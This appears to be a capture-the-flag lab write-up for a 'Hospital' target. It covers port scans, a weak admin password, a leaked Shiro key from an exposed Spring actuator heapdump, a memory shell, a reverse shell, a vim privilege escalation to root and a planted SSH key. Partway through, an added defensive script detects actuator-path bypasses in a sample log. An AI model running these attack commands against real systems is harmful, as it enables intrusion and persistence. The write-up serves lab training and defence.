春秋云境 (Chunqiu Yunjing) - Hospital

Alone on a grey hill,
treading the dry, withered grass underfoot,
my thoughts drift to the far side of the sky.
Petals swaying in the wind,
like your soft, gentle smile.


Target IP: 39.99.147.67

Difficulty: easy

Topics covered:

  • Information gathering: port scanning (Fscan/Nmap), service fingerprinting.
  • Internal network pivoting: multi-hop proxy setup (Stowaway), SOCKS5 tunnel configuration, forwarding traffic through Proxychains.
  • Web exploitation: Grafana directory traversal (CVE-2021-43798) to read sensitive files.
  • Lateral movement: weak-password scanning on the internal network, abuse of SSH keys.
  • Database attack and defense: PostgreSQL weak-password login, UDF (User-Defined Function) privilege escalation, shared-library injection.
  • Breaking out of restricted environments: LOLBins (Living off the Land Binaries) on minimal Linux, calling binaries by absolute path, bypassing PATH restrictions.

Port scanning

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./FScan_2.0.1_linux_x32 -h 39.99.147.67
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[1.2s] 已选择服务扫描模式
[1.2s] 开始信息扫描
[1.2s] 最终有效主机数量: 1
[1.2s] 开始主机扫描
[1.2s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.2s] 有效端口数量: 233
[1.3s] [*] 端口开放 39.99.147.67:22
[1.4s] [*] 端口开放 39.99.147.67:8080
[4.3s] 扫描完成, 发现 2 个开放端口
[4.3s] 存活端口数量: 2
[4.3s] 开始漏洞扫描
[4.3s] POC加载完成: 总共387个,成功387个,失败0个
[5.1s] [*] 网站标题 http://39.99.147.67:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://39.99.147.67:8080/login;jsessionid=A99CACDB950188E9367E24F7DE8147E4
[5.5s] [*] 网站标题 http://39.99.147.67:8080/login;jsessionid=A99CACDB950188E9367E24F7DE8147E4 状态码:200 长度:2005 标题:医疗管理后台
[50.2s] 扫描已完成: 3/3
PS E:\CTF> .\fscan.exe -h 39.99.147.67
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2026-02-07 13:26:56] [INFO] 暴力破解线程数: 1
[2026-02-07 13:26:56] [INFO] 开始信息扫描
[2026-02-07 13:26:57] [INFO] 最终有效主机数量: 1
[2026-02-07 13:26:57] [INFO] 开始主机扫描
[2026-02-07 13:26:57] [INFO] 有效端口数量: 233
[2026-02-07 13:26:57] [SUCCESS] 端口开放 39.99.147.67:22
[2026-02-07 13:26:57] [SUCCESS] 服务识别 39.99.147.67:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-07 13:26:59] [SUCCESS] 端口开放 39.99.147.67:8080
[2026-02-07 13:27:04] [SUCCESS] 服务识别 39.99.147.67:8080 => [http]
[2026-02-07 13:27:06] [INFO] 存活端口数量: 2
[2026-02-07 13:27:06] [INFO] 开始漏洞扫描
[2026-02-07 13:27:06] [INFO] 加载的插件: ssh, webpoc, webtitle
[2026-02-07 13:27:07] [SUCCESS] 网站标题 http://39.99.147.67:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://39.99.147.67:8080/login;jsessionid=18A0DA74E437BA26F38B6621DC4E9932
[2026-02-07 13:27:07] [SUCCESS] 网站标题 http://39.99.147.67:8080/login;jsessionid=18A0DA74E437BA26F38B6621DC4E9932 状态码:200 长度:2005 标题:医疗管理后台
[2026-02-07 13:27:14] [SUCCESS] 目标: http://39.99.147.67:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2026-02-07 13:27:19] [SUCCESS] 扫描已完成: 3/3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -A -T4 39.99.147.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-07 00:05 -0500
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 00:05 (0:00:00 remaining)
Warning: 39.99.147.67 giving up on port because retransmission cap hit (6).
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:06 (0:00:06 remaining)
Nmap scan report for 39.99.147.67
Host is up (0.0087s latency).
Not shown: 926 closed tcp ports (reset), 72 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 73:68:f3:16:ef:b2:7c:ea:a4:ca:03:e0:f0:cb:31:c4 (RSA)
| 256 0f:03:f5:40:df:f7:7f:af:39:1f:81:59:b1:71:8a:8a (ECDSA)
|_ 256 6c:6c:ea:2b:8f:df:fd:80:fa:c7:89:4d:f1:7d:bc:b8 (ED25519)
8080/tcp open http Apache Tomcat (language: en)
| http-title: \xE5\x8C\xBB\xE7\x96\x97\xE7\xAE\xA1\xE7\x90\x86\xE5\x90\x8E\xE5\x8F\xB0
|_Requested resource was http://39.99.147.67:8080/login;jsessionid=588133AF0C6C0AD3B58E015F17951AEB
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (96%), DD-WRT v24-sp2 (Linux 2.4.37) (95%), Linux 4.4 (93%), Linux 3.2 (92%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (92%), Microsoft Windows XP SP3 (90%), VMware Player virtual NAT device (88%), BlueArc Titan 2100 NAS device (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.08 ms 192.168.21.2
2 0.10 ms 39.99.147.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.37 seconds

Brute-forced the weak login with Burp.

admin:admin123

That gets into the admin panel, but there is nothing exploitable there. Next, directory brute-forcing with dirsearch.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u http://39.99.147.67:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_39.99.147.67_8080/_26-02-07_00-37-32.txt

Target: http://39.99.147.67:8080/

[00:37:32] Starting:
[00:37:37] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:37:38] 400 - 435B - /a%5c.aspx
[00:37:38] 200 - 1KB - /actuator
[00:37:38] 200 - 20B - /actuator/;/caches
[00:37:38] 200 - 2B - /actuator/;/info
[00:37:38] 200 - 74KB - /actuator/;/beans
[00:37:39] 200 - 15B - /actuator/;/health
[00:37:39] 200 - 749B - /actuator/;/metrics
[00:37:39] 404 - 135B - /actuator/;/env
[00:37:39] 200 - 93KB - /actuator/;/conditions
[00:37:39] 404 - 150B - /actuator/;/registeredServices
[00:37:39] 404 - 140B - /actuator/;/features
[00:37:39] 404 - 143B - /actuator/;/auditevents
[00:37:39] 404 - 153B - /actuator/;/configurationMetadata
[00:37:39] 404 - 143B - /actuator/;/healthcheck
[00:37:39] 404 - 156B - /actuator/;/exportRegisteredServices
[00:37:39] 404 - 142B - /actuator/;/prometheus
[00:37:39] 404 - 138B - /actuator/;/events
[00:37:39] 404 - 138B - /actuator/;/flyway
[00:37:39] 404 - 141B - /actuator/;/liquibase
[00:37:39] 404 - 139B - /actuator/;/jolokia
[00:37:39] 404 - 136B - /actuator/;/dump
[00:37:39] 404 - 140B - /actuator/;/auditLog
[00:37:39] 404 - 148B - /actuator/;/integrationgraph
[00:37:39] 404 - 145B - /actuator/;/loggingConfig
[00:37:39] 404 - 141B - /actuator/;/httptrace
[00:37:39] 404 - 139B - /actuator/;/logfile
[00:37:39] 404 - 139B - /actuator/;/refresh
[00:37:39] 200 - 20KB - /actuator/;/mappings
[00:37:39] 404 - 149B - /actuator/;/resolveAttributes
[00:37:39] 404 - 135B - /actuator/;/sso
[00:37:39] 404 - 149B - /actuator/;/releaseAttributes
[00:37:39] 404 - 138B - /actuator/auditLog
[00:37:39] 404 - 145B - /actuator/;/springWebflow
[00:37:39] 200 - 54B - /actuator/;/scheduledtasks
[00:37:39] 404 - 137B - /actuator/;/trace
[00:37:39] 404 - 142B - /actuator/;/statistics
[00:37:39] 200 - 20B - /actuator/caches
[00:37:39] 404 - 143B - /actuator/;/ssoSessions
[00:37:39] 404 - 138B - /actuator/;/status
[00:37:39] 404 - 151B - /actuator/configurationMetadata
[00:37:39] 404 - 141B - /actuator/auditevents
[00:37:39] 404 - 134B - /actuator/dump
[00:37:39] 404 - 140B - /actuator/;/sessions
[00:37:39] 404 - 140B - /actuator/;/shutdown
[00:37:39] 404 - 133B - /actuator/env
[00:37:39] 404 - 136B - /actuator/events
[00:37:39] 200 - 15B - /actuator/health
[00:37:39] 404 - 139B - /actuator/httptrace
[00:37:39] 404 - 138B - /actuator/features
[00:37:39] 404 - 144B - /actuator/gateway/routes
[00:37:39] 404 - 154B - /actuator/exportRegisteredServices
[00:37:39] 404 - 136B - /actuator/flyway
[00:37:39] 404 - 141B - /actuator/healthcheck
[00:37:39] 200 - 93KB - /actuator/conditions
[00:37:39] 200 - 74KB - /actuator/beans
[00:37:39] 200 - 54KB - /actuator/;/loggers
[00:37:40] 200 - 2B - /actuator/info
[00:37:40] 404 - 140B - /actuator/management
[00:37:40] 404 - 139B - /actuator/liquibase
[00:37:40] 404 - 137B - /actuator/logfile
[00:37:40] 404 - 137B - /actuator/refresh
[00:37:40] 200 - 54B - /actuator/scheduledtasks
[00:37:40] 200 - 749B - /actuator/metrics
[00:37:40] 404 - 140B - /actuator/prometheus
[00:37:40] 404 - 146B - /actuator/integrationgraph
[00:37:40] 404 - 147B - /actuator/releaseAttributes
[00:37:40] 404 - 144B - /actuator/hystrix.stream
[00:37:40] 404 - 143B - /actuator/loggingConfig
[00:37:40] 404 - 138B - /actuator/sessions
[00:37:40] 404 - 137B - /actuator/jolokia
[00:37:40] 404 - 147B - /actuator/resolveAttributes
[00:37:40] 404 - 138B - /actuator/shutdown
[00:37:40] 404 - 148B - /actuator/registeredServices
[00:37:40] 200 - 20KB - /actuator/mappings
[00:37:40] 200 - 8KB - /actuator/;/configprops
[00:37:40] 200 - 8KB - /actuator/configprops
[00:37:40] 404 - 140B - /actuator/statistics
[00:37:40] 404 - 143B - /actuator/springWebflow
[00:37:40] 200 - 196KB - /actuator/;/threaddump
[00:37:40] 404 - 135B - /actuator/trace
[00:37:40] 404 - 133B - /actuator/sso
[00:37:40] 404 - 141B - /actuator/ssoSessions
[00:37:40] 404 - 136B - /actuator/status
[00:37:40] 200 - 54KB - /actuator/loggers
[00:37:40] 200 - 113KB - /actuator/threaddump
[00:37:41] 200 - 31MB - /actuator/;/heapdump
[00:37:41] 200 - 33MB - /actuator/heapdump
[00:37:53] 404 - 132B - /favicon.ico
[00:37:56] 404 - 134B - /images/README
[00:37:56] 404 - 127B - /images
[00:37:56] 404 - 135B - /images/Sym.php
[00:37:56] 404 - 135B - /images/c99.php
[00:37:56] 404 - 128B - /images/
[00:37:58] 200 - 2KB - /login
[00:38:00] 404 - 129B - /META-INF
[00:38:00] 404 - 144B - /META-INF/app-config.xml
[00:38:00] 404 - 152B - /META-INF/application-client.xml
[00:38:00] 404 - 145B - /META-INF/application.xml
[00:38:00] 404 - 130B - /META-INF/
[00:38:00] 404 - 139B - /META-INF/beans.xml
[00:38:00] 404 - 137B - /META-INF/CERT.SF
[00:38:00] 404 - 143B - /META-INF/container.xml
[00:38:00] 404 - 141B - /META-INF/context.xml
[00:38:00] 404 - 141B - /META-INF/eclipse.inf
[00:38:00] 404 - 141B - /META-INF/ejb-jar.xml
[00:38:00] 404 - 143B - /META-INF/jboss-app.xml
[00:38:00] 404 - 151B - /META-INF/jboss-webservices.xml
[00:38:00] 404 - 160B - /META-INF/jboss-deployment-structure.xml
[00:38:00] 404 - 144B - /META-INF/jboss-ejb3.xml
[00:38:00] 404 - 147B - /META-INF/jbosscmp-jdbc.xml
[00:38:00] 404 - 145B - /META-INF/ironjacamar.xml
[00:38:00] 404 - 146B - /META-INF/jboss-client.xml
[00:38:00] 404 - 150B - /META-INF/jboss-ejb-client.xml
[00:38:00] 404 - 166B - /META-INF/openwebbeans/openwebbeans.properties
[00:38:00] 404 - 145B - /META-INF/persistence.xml
[00:38:00] 404 - 154B - /META-INF/weblogic-application.xml
[00:38:00] 404 - 160B - /META-INF/spring/application-context.xml
[00:38:00] 404 - 136B - /META-INF/ra.xml
[00:38:00] 404 - 141B - /META-INF/MANIFEST.MF
[00:38:00] 404 - 141B - /META-INF/SOFTWARE.SF
[00:38:00] 404 - 150B - /META-INF/weblogic-ejb-jar.xml
[00:38:12] 404 - 128B - /WEB-INF
[00:38:12] 404 - 129B - /WEB-INF/
[00:38:12] 404 - 144B - /WEB-INF/cas-servlet.xml
[00:38:12] 404 - 151B - /WEB-INF/applicationContext.xml
[00:38:12] 404 - 151B - /WEB-INF/application-client.xml
[00:38:12] 404 - 151B - /WEB-INF/classes/app-config.xml
[00:38:12] 404 - 138B - /WEB-INF/beans.xml
[00:38:12] 404 - 151B - /WEB-INF/application_config.xml
[00:38:12] 404 - 159B - /WEB-INF/classes/application.properties
[00:38:12] 404 - 143B - /WEB-INF/cas.properties
[00:38:12] 404 - 159B - /WEB-INF/classes/applicationContext.xml
[00:38:12] 404 - 150B - /WEB-INF/classes/db.properties
[00:38:12] 404 - 152B - /WEB-INF/classes/application.yml
[00:38:12] 404 - 154B - /WEB-INF/classes/config.properties
[00:38:12] 404 - 157B - /WEB-INF/classes/countries.properties
[00:38:12] 404 - 165B - /WEB-INF/classes/cas-theme-default.properties
[00:38:12] 404 - 163B - /WEB-INF/classes/commons-logging.properties
[00:38:12] 404 - 146B - /WEB-INF/classes/log4j.xml
[00:38:12] 404 - 153B - /WEB-INF/classes/log4j.properties
[00:38:12] 404 - 153B - /WEB-INF/classes/faces-config.xml
[00:38:12] 404 - 154B - /WEB-INF/classes/hibernate.cfg.xml
[00:38:12] 404 - 150B - /WEB-INF/classes/languages.xml
[00:38:12] 404 - 145B - /WEB-INF/classes/demo.xml
[00:38:12] 404 - 148B - /WEB-INF/classes/logback.xml
[00:38:12] 404 - 161B - /WEB-INF/classes/default_views.properties
[00:38:12] 404 - 161B - /WEB-INF/classes/default-theme.properties
[00:38:12] 404 - 157B - /WEB-INF/classes/fckeditor.properties
[00:38:12] 404 - 156B - /WEB-INF/classes/messages.properties
[00:38:12] 404 - 147B - /WEB-INF/classes/mobile.xml
[00:38:12] 404 - 162B - /WEB-INF/classes/protocol_views.properties
[00:38:12] 404 - 160B - /WEB-INF/classes/META-INF/app-config.xml
[00:38:12] 404 - 164B - /WEB-INF/classes/resources/config.properties
[00:38:12] 404 - 152B - /WEB-INF/classes/persistence.xml
[00:38:12] 404 - 161B - /WEB-INF/classes/META-INF/persistence.xml
[00:38:12] 404 - 158B - /WEB-INF/classes/validation.properties
[00:38:12] 404 - 154B - /WEB-INF/classes/struts-default.vm
[00:38:12] 404 - 153B - /WEB-INF/classes/theme.properties
[00:38:12] 404 - 156B - /WEB-INF/classes/velocity.properties
[00:38:12] 404 - 156B - /WEB-INF/classes/services.properties
[00:38:12] 404 - 147B - /WEB-INF/classes/struts.xml
[00:38:12] 404 - 143B - /WEB-INF/components.xml
[00:38:12] 404 - 154B - /WEB-INF/classes/struts.properties
[00:38:12] 404 - 144B - /WEB-INF/classes/web.xml
[00:38:12] 404 - 151B - /WEB-INF/conf/caches.properties
[00:38:12] 404 - 144B - /WEB-INF/conf/caches.dat
[00:38:12] 404 - 151B - /WEB-INF/conf/config.properties
[00:38:12] 404 - 152B - /WEB-INF/conf/daemons.properties
[00:38:12] 404 - 142B - /WEB-INF/conf/core.xml
[00:38:12] 404 - 150B - /WEB-INF/conf/core_context.xml
[00:38:12] 404 - 149B - /WEB-INF/conf/jpa_context.xml
[00:38:12] 404 - 150B - /WEB-INF/conf/jtidy.properties
[00:38:12] 404 - 152B - /WEB-INF/conf/editors.properties
[00:38:12] 404 - 147B - /WEB-INF/conf/db.properties
[00:38:12] 404 - 151B - /WEB-INF/conf/lutece.properties
[00:38:12] 404 - 144B - /WEB-INF/conf/mime.types
[00:38:12] 404 - 151B - /WEB-INF/conf/search.properties
[00:38:12] 404 - 152B - /WEB-INF/conf/page_navigator.xml
[00:38:12] 404 - 139B - /WEB-INF/config.xml
[00:38:12] 404 - 148B - /WEB-INF/conf/wml.properties
[00:38:12] 404 - 154B - /WEB-INF/conf/webmaster.properties
[00:38:12] 404 - 160B - /WEB-INF/config/dashboard-statistics.xml
[00:38:12] 404 - 152B - /WEB-INF/config/faces-config.xml
[00:38:12] 404 - 145B - /WEB-INF/config/users.xml
[00:38:12] 404 - 148B - /WEB-INF/config/web-core.xml
[00:38:12] 404 - 153B - /WEB-INF/config/mua-endpoints.xml
[00:38:12] 404 - 153B - /WEB-INF/config/webmvc-config.xml
[00:38:12] 404 - 150B - /WEB-INF/config/soapConfig.xml
[00:38:12] 404 - 154B - /WEB-INF/config/webflow-config.xml
[00:38:12] 404 - 148B - /WEB-INF/config/metadata.xml
[00:38:12] 404 - 145B - /WEB-INF/faces-config.xml
[00:38:12] 404 - 148B - /WEB-INF/config/security.xml
[00:38:12] 404 - 143B - /WEB-INF/decorators.xml
[00:38:12] 404 - 154B - /WEB-INF/deployerConfigContext.xml
[00:38:12] 404 - 151B - /WEB-INF/dispatcher-servlet.xml
[00:38:12] 404 - 146B - /WEB-INF/hibernate.cfg.xml
[00:38:12] 404 - 152B - /WEB-INF/glassfish-resources.xml
[00:38:12] 404 - 146B - /WEB-INF/glassfish-web.xml
[00:38:12] 404 - 145B - /WEB-INF/geronimo-web.xml
[00:38:12] 404 - 140B - /WEB-INF/ejb-jar.xml
[00:38:12] 404 - 140B - /WEB-INF/ias-web.xml
[00:38:12] 404 - 159B - /WEB-INF/jboss-deployment-structure.xml
[00:38:12] 404 - 144B - /WEB-INF/ibm-web-ext.xmi
[00:38:12] 404 - 147B - /WEB-INF/jax-ws-catalog.xml
[00:38:12] 404 - 144B - /WEB-INF/ibm-web-bnd.xmi
[00:38:12] 404 - 143B - /WEB-INF/jboss-ejb3.xml
[00:38:12] 404 - 145B - /WEB-INF/jboss-client.xml
[00:38:12] 404 - 142B - /WEB-INF/jboss-web.xml
[00:38:12] 404 - 142B - /WEB-INF/jetty-env.xml
[00:38:12] 404 - 142B - /WEB-INF/jetty-web.xml
[00:38:12] 404 - 142B - /WEB-INF/jonas-web.xml
[00:38:12] 404 - 150B - /WEB-INF/jboss-webservices.xml
[00:38:12] 404 - 141B - /WEB-INF/jrun-web.xml
[00:38:12] 404 - 155B - /WEB-INF/liferay-plugin-package.xml
[00:38:12] 404 - 157B - /WEB-INF/liferay-layout-templates.xml
[00:38:12] 404 - 154B - /WEB-INF/liferay-look-and-feel.xml
[00:38:12] 404 - 148B - /WEB-INF/liferay-display.xml
[00:38:12] 404 - 148B - /WEB-INF/liferay-portlet.xml
[00:38:12] 404 - 149B - /WEB-INF/jboss-ejb-client.xml
[00:38:12] 404 - 140B - /WEB-INF/logback.xml
[00:38:12] 404 - 141B - /WEB-INF/logs/log.log
[00:38:12] 404 - 140B - /WEB-INF/portlet.xml
[00:38:12] 404 - 138B - /WEB-INF/local.xml
[00:38:12] 404 - 149B - /WEB-INF/remoting-servlet.xml
[00:38:12] 404 - 145B - /WEB-INF/openx-config.xml
[00:38:12] 404 - 149B - /WEB-INF/local-jps.properties
[00:38:12] 404 - 156B - /WEB-INF/resources/config.properties
[00:38:12] 404 - 142B - /WEB-INF/resin-web.xml
[00:38:12] 404 - 142B - /WEB-INF/rexip-web.xml
[00:38:12] 404 - 147B - /WEB-INF/portlet-custom.xml
[00:38:12] 404 - 150B - /WEB-INF/quartz-properties.xml
[00:38:12] 404 - 148B - /WEB-INF/restlet-servlet.xml
[00:38:12] 404 - 146B - /WEB-INF/spring-config.xml
[00:38:12] 404 - 140B - /WEB-INF/service.xsd
[00:38:12] 404 - 141B - /WEB-INF/sitemesh.xml
[00:38:12] 404 - 166B - /WEB-INF/spring-config/application-context.xml
[00:38:12] 404 - 164B - /WEB-INF/spring-config/management-config.xml
[00:38:12] 404 - 167B - /WEB-INF/spring-config/authorization-config.xml
[00:38:12] 404 - 163B - /WEB-INF/spring-config/messaging-config.xml
[00:38:12] 404 - 169B - /WEB-INF/spring-config/services-remote-config.xml
[00:38:12] 404 - 166B - /WEB-INF/spring-config/presentation-config.xml
[00:38:12] 404 - 162B - /WEB-INF/spring-config/services-config.xml
[00:38:12] 404 - 161B - /WEB-INF/spring-configuration/filters.xml
[00:38:12] 404 - 158B - /WEB-INF/spring-dispatcher-servlet.xml
[00:38:12] 404 - 147B - /WEB-INF/spring-context.xml
[00:38:12] 404 - 143B - /WEB-INF/spring-mvc.xml
[00:38:12] 404 - 150B - /WEB-INF/struts-config-ext.xml
[00:38:12] 404 - 150B - /WEB-INF/spring-ws-servlet.xml
[00:38:12] 404 - 153B - /WEB-INF/spring/webmvc-config.xml
[00:38:12] 404 - 142B - /WEB-INF/sun-jaxws.xml
[00:38:12] 404 - 150B - /WEB-INF/springweb-servlet.xml
[00:38:12] 404 - 140B - /WEB-INF/tjc-web.xml
[00:38:12] 404 - 154B - /WEB-INF/struts-config-widgets.xml
[00:38:12] 404 - 140B - /WEB-INF/sun-web.xml
[00:38:12] 404 - 148B - /WEB-INF/trinidad-config.xml
[00:38:12] 404 - 143B - /WEB-INF/urlrewrite.xml
[00:38:12] 404 - 143B - /WEB-INF/tiles-defs.xml
[00:38:12] 404 - 143B - /WEB-INF/validation.xml
[00:38:12] 404 - 148B - /WEB-INF/validator-rules.xml
[00:38:12] 404 - 140B - /WEB-INF/web.xml.jsf
[00:38:12] 404 - 136B - /WEB-INF/web.xml
[00:38:12] 404 - 142B - /WEB-INF/web-jetty.xml
[00:38:12] 404 - 144B - /WEB-INF/web-borland.xml
[00:38:12] 404 - 146B - /WEB-INF/struts-config.xml
[00:38:12] 404 - 137B - /WEB-INF/web2.xml
[00:38:12] 404 - 141B - /WEB-INF/weblogic.xml
[00:38:12] 404 - 152B - /WEB-INF/workflow-properties.xml

Task Completed

Combined with the earlier fscan result: the actuator heapdump file is exposed.

Spring heapdump information disclosure, reproduced from 0 to 1 - 月亮丶 - 博客园 (cnblogs)

Exploiting a misconfigured Spring Boot actuator - FreeBuf

Analyze the heapdump with JDumpSpider.
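From the defender's side, the interesting detail in the dirsearch output is that `/actuator/;/heapdump` and `/actuator/heapdump` both returned 200: Tomcat and Spring treat `;...` as a path parameter, so a filter that only matches the literal prefix `/actuator/` misses the first spelling. The following added example (my own code, not from the writeup or any project it names) normalizes request paths before matching and flags successful reads of secret-bearing actuator endpoints in a constructed access log; the IPs, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote

# Actuator endpoints whose successful exposure leaks secrets or internals
# (heapdump carried the Shiro key in this writeup; env/configprops carry
# configuration; threaddump, beans and mappings carry application internals).
SENSITIVE_ENDPOINTS = {"heapdump", "env", "configprops", "threaddump", "beans", "mappings", "loggers"}

# Common/combined log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def normalize_path(raw_path):
    """Collapse the spellings a client can use for one resource.

    URL-decodes, drops the query string, strips ';param' path parameters from
    every segment (so /actuator/;/heapdump, /actuator/heapdump and
    /login;jsessionid=... are compared correctly) and resolves '.' and '..'.
    """
    path = unquote(raw_path.split("?", 1)[0])
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # servlet containers treat ';...' as a path parameter
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def classify(line):
    """Return a finding dict for an actuator request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group("path")
    path = normalize_path(raw)
    parts = path.strip("/").split("/")
    if parts[0] != "actuator":
        return None
    endpoint = parts[1] if len(parts) > 1 else ""
    status = int(m.group("status"))
    served = 200 <= status < 300
    return {
        "ip": m.group("ip"),
        "raw_path": raw,
        "endpoint": endpoint,
        "status": status,
        # a ';' in the request path means a path-parameter spelling was used,
        # which is exactly what a naive "/actuator/" prefix filter misses
        "bypass_spelling": ";" in raw.split("?", 1)[0],
        "severity": "high" if served and endpoint in SENSITIVE_ENDPOINTS else "info",
    }


def report(lines):
    return [f for f in map(classify, lines) if f is not None]


def summarize(lines):
    """Per-source-IP counts: actuator hits, high-severity hits, bypass spellings."""
    out = {}
    for f in report(lines):
        s = out.setdefault(f["ip"], {"hits": 0, "high": 0, "bypass": 0})
        s["hits"] += 1
        s["high"] += int(f["severity"] == "high")
        s["bypass"] += int(f["bypass_spelling"])
    return out


# Constructed sample access log (documentation IP ranges), mirroring the request
# pattern of the dirsearch run above; not a log taken from the target.
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [07/Feb/2026:00:37:38 +0000] "GET /actuator HTTP/1.1" 200 1024',
    '203.0.113.10 - - [07/Feb/2026:00:37:39 +0000] "GET /actuator/;/env HTTP/1.1" 404 135',
    '203.0.113.10 - - [07/Feb/2026:00:37:41 +0000] "GET /actuator/;/heapdump HTTP/1.1" 200 32505856',
    '203.0.113.10 - - [07/Feb/2026:00:37:41 +0000] "GET /actuator/heapdump HTTP/1.1" 200 34603008',
    '198.51.100.7 - - [07/Feb/2026:00:38:00 +0000] "GET /login;jsessionid=ABC123 HTTP/1.1" 200 2005',
    '198.51.100.7 - - [07/Feb/2026:00:38:01 +0000] "GET /actuator/health HTTP/1.1" 200 15',
]

if __name__ == "__main__":
    for f in report(SAMPLE_ACCESS_LOG):
        print(f["severity"].upper(), f["ip"], f["raw_path"], "->", "/actuator/" + f["endpoint"], f["status"])
    print(summarize(SAMPLE_ACCESS_LOG))
```

The point of `normalize_path` is that the detection rule and the application must agree on what a request means; matching on the raw string is what lets `/actuator/;/heapdump` slip past a WAF rule or an access-log search for `/actuator/heapdump`. The same normalization belongs in any allowlist filter placed in front of the management endpoints.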

PS E:\CTF> java -jar JDumpSpider-1.1-SNAPSHOT-full.jar E:\下载\heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

The Shiro key is leaked.

Use a Shiro exploitation tool to inject a memory shell.

Privilege escalation via vim also lets us drop a public key on the way, but that requires an interactive shell, so first get a reverse shell back to our VPS.

(I had to shut the machine down for a while in the middle of this, so the target IP changes from here on.)

root@dkhkdZlNGAAKbnRQBVLf:~# nc -lvvp 80
Listening on 0.0.0.0 80
Connection received on 39.98.119.127 54714
id
uid=1000(app) gid=1000(app) groups=1000(app)

Upgrade the shell to a pseudo-interactive one. (I don't know why Penelope hung here and could not do the upgrade automatically.)

python3 -c 'import pty; pty.spawn("/bin/bash")'
app@web01:~$

Privilege escalation

app@web01:~$ /usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec bash -p")'
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec bash -p")'



bash-5.0# whoami
whoami
root
bash-5.0#

Write the public key

bash-5.0# echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
bash-5.0#

┌──(root㉿kaada)-[~/.ssh]
└─# ssh root@39.98.119.127
The authenticity of host '39.98.119.127 (39.98.119.127)' can't be established.
ED25519 key fingerprint is: SHA256:muothx+zhk/93sC3+EZzKetY8vqZ720iROGc/pJ+zF0
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '39.98.119.127' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
